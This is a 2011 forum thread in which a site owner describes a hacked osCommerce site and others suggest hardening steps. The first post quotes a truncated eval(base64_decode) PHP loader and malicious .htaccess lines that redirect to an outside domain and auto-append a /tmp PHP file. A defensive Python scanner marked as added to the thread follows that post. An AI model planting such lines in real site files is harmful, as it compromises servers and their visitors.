
website security guidance


3 replies to this topic

#1 greatchap


Posted 23 May 2011 - 02:59 AM

Hello Guys,

How are you?

I have a website which is hosted by Hostgator. My website consists of PHP pages, an osCommerce system and MySQL databases. My site receives low-moderate traffic, I guess.

Now a month ago there was some php injection or some attack. All the php files in my website were infected by some code which appeared on top of the php scripts. It was <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC...

I had to edit all php files and remove that code from there.

Now recently my site stopped opening. I got the error "Internal Server Error". After some research I figured out that the .htaccess file had been tampered with. The following lines were appearing in each .htaccess file.

ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 406 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 408 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 500 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 501 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 502 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 503 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 504 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 505 http://arthurlundt.cz.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13061108586234.php"


So I had to remove the files from their respective folders. I don't know why this is happening. What I know is that the osCommerce installation on the site is outdated. That could be one reason.

But otherwise, what can I do to protect myself? I will tell the guys who developed my site to at least update the osCommerce installation.

I would be glad if anyone can help me.

Thanks a lot,

Cheers,
GR
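A defensive check for the two indicators described in the post above (the `eval(base64_decode(` loader in PHP files and the tampered `.htaccess` directives), as an added example that is not part of the original thread. The rule names, the `scan_file`/`scan_tree`/`demo` helpers and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Loader of the shape quoted in the post: eval(base64_decode('...'))
PHP_LOADER = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)

# .htaccess directives matching the tampering listed in the post (hypothetical rule names)
HTACCESS_RULES = {
    "remote-errordocument": re.compile(r"^\s*ErrorDocument\s+\d{3}\s+https?://", re.I),
    "auto-append-file": re.compile(r"^\s*php_value\s+auto_(?:append|prepend)_file\b", re.I),
    "php-handler-on-html": re.compile(r"^\s*AddHandler\s+\S*php\S*\s.*\.html?\b", re.I),
}

def scan_file(path: Path):
    """Return findings for one file as a list of (rule, line_number)."""
    text = path.read_text(errors="replace")
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if path.name == ".htaccess":
            findings += [(rule, lineno) for rule, rx in HTACCESS_RULES.items() if rx.search(line)]
        elif path.suffix.lower() == ".php" and PHP_LOADER.search(line):
            findings.append(("eval-base64-loader", lineno))
    return findings

def scan_tree(root):
    """Walk a web root and map each flagged file (relative path) to its findings."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.name == ".htaccess" or path.suffix.lower() == ".php"):
            hits = scan_file(path)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Build a constructed web root (sample data, not from the affected site) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "shop").mkdir()
        (root / "index.php").write_text("<?php /**/eval(base64_decode('Y29uc3RydWN0ZWQ='));?>\n<?php echo 'home'; ?>\n")
        (root / "shop" / "clean.php").write_text("<?php echo base64_decode('aGk='); ?>\n")
        (root / "shop" / ".htaccess").write_text(
            "ErrorDocument 404 http://redirect.example.invalid/docs/\n"
            "ErrorDocument 404 /errors/404.html\n"
            "AddHandler application/x-httpd-php .html .htm\n"
            'php_value auto_append_file "/tmp/constructed.php"\n')
        return scan_tree(root)
```

Calling `scan_tree()` on the real document root after cleanup shows whether any file still carries either indicator; a local `ErrorDocument` path and a plain `base64_decode` call without `eval` are deliberately not flagged.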



#2 Andrew


Posted 23 May 2011 - 04:53 AM

From what I've read, OsCommerce is a terribly vulnerable platform to be using. The most common suggestions I've been seeing are to rename and password protect the /admin directory.

Though, given what I've just read, I would also suggest that perhaps ditching OsCommerce altogether might be called for.

#3 WeWatch


Posted 23 May 2011 - 06:45 AM

There are many steps you can take to secure an osCommerce site.

You can replace the $PHP_SELF lines in the application_top.php files (2 of them).

You can, as someone has already suggested, rename the admin folder (security by obscurity).

You can disable the file_manager.php and define_language.php files (they are two of the most attacked files on osCommerce).

You can use a variety of methods to prevent the double .php attack.

You can use a strong .htaccess file (if you're not on Windows).

These steps go a long way in preventing osCommerce breaches.

#4 greatchap


Posted 24 May 2011 - 06:08 AM

Thanks a lot for your input guys.

I was talking to the guy who developed my website. He said that a lot of custom coding has been done by us and we have used the bare minimum of the osCommerce framework.

He says the problems are a result of your website hoster's weak security. In other words, according to him, websites hosted by Hostgator are prone to malware attacks or security breaches because their security is weak.

What should I do? Should I leave Hostgator?



